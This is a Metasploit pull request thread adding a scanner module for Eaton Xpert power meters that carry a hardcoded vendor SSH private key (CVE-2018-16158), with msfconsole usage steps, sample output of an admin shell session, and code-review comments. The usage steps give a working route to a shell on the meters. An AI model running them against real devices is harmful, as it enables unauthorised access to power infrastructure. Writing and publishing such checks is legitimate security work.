Scan module for eaton_xpert_backdoor CVE-2018-16158
rapid7/metasploit-framework pull request #10572
Opened 2018-08-31 23:21 UTC by BrianWGray

Module scans for Eaton Xpert Power meters with a vendor SSH private key used in the device firmware's build process.

**Usage**
- [ ] Start `msfconsole`
- [ ] `use auxiliary/scanner/ssh/eaton_xpert_backdoor`
- [ ] `set RHOSTS 192.168.135.155`
- [ ] `run -z`

**Example output**
```
[+] 192.168.135.155:22 - Logged in as admin
[*] Command shell session 1 opened (192.168.135.1:62063 -> 192.168.135.155:22) at 2018-08-31 19:12:21 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

- [ ] `sessions`
```

Active sessions
===============

  Id  Name  Type   Information                                                      Connection
  --  ----  ----   -----------                                                      ----------
  1         basic   Eaton Xpert Meter SSH Backdoor (SSH-2.0-OpenSSH_7.7p1 Debian-4)  192.168.135.1:62063 -> 192.168.135.155:22 (192.168.135.155)

```

2018-08-31 23:25 UTC, jhart-r7 commented on modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
> +-----BEGIN RSA PRIVATE KEY-----
Probably worth a PR to https://github.com/rapid7/ssh-badkeys/

2018-09-05 14:17 UTC, jrobles-r7 commented on modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
> +        ['CVE', 'CVE-2018-16158'],
Remove `CVE-` from `CVE-2018-16158`.

2018-09-05 14:26 UTC, BrianWGray commented
For what it's worth, note the Kex/Encryption downgrade requirements that must be set to connect to the device.

2018-11-10 13:41 UTC, h00die commented
@BrianWGray Believe we're still waiting on some module documentation for this.  That would also help clean up a lot of the comments at the top of the module

2018-11-10 17:24 UTC, h00die requested changes

2018-11-13 21:32 UTC, BrianWGray commented on modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb
> +        ['URL', 'http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf'],
Yeah, the vendor wanted as little to do with the issue as possible until I asked about publishing Nexpose/MSF checks for it. I wasn't surprised at all by the minimalistic notice.

2018-11-15 22:18 UTC, merged

2018-11-15 22:21 UTC, h00die commented
@BrianWGray Thanks for hanging in there, we're just really backed up right now!  Thanks also for the first time submission!  I would have had this landed a few days ago but unfortunately had an Americans Funniest Home Videos moment where I rolled an ankle going down the stairs and face planted into the side of the car.  Been on the couch ever since :(

I had 2 very minor edits, while you've been awesome on getting requested changes in, I didn't want to delay this any further!  https://github.com/rapid7/metasploit-framework/commit/17b37b2ad91216091c22956d6ceb4dad7a4cb439 (the msf md->html doesn't always agree with githubs, so just some minor formatting), and https://github.com/rapid7/metasploit-framework/commit/de014f05995db61e1a251808becae7a6d587d442

2018-11-15 22:21 UTC, h00die commented
# Release Notes
This module adds an SSH scanner for Eaton power meters with a known private key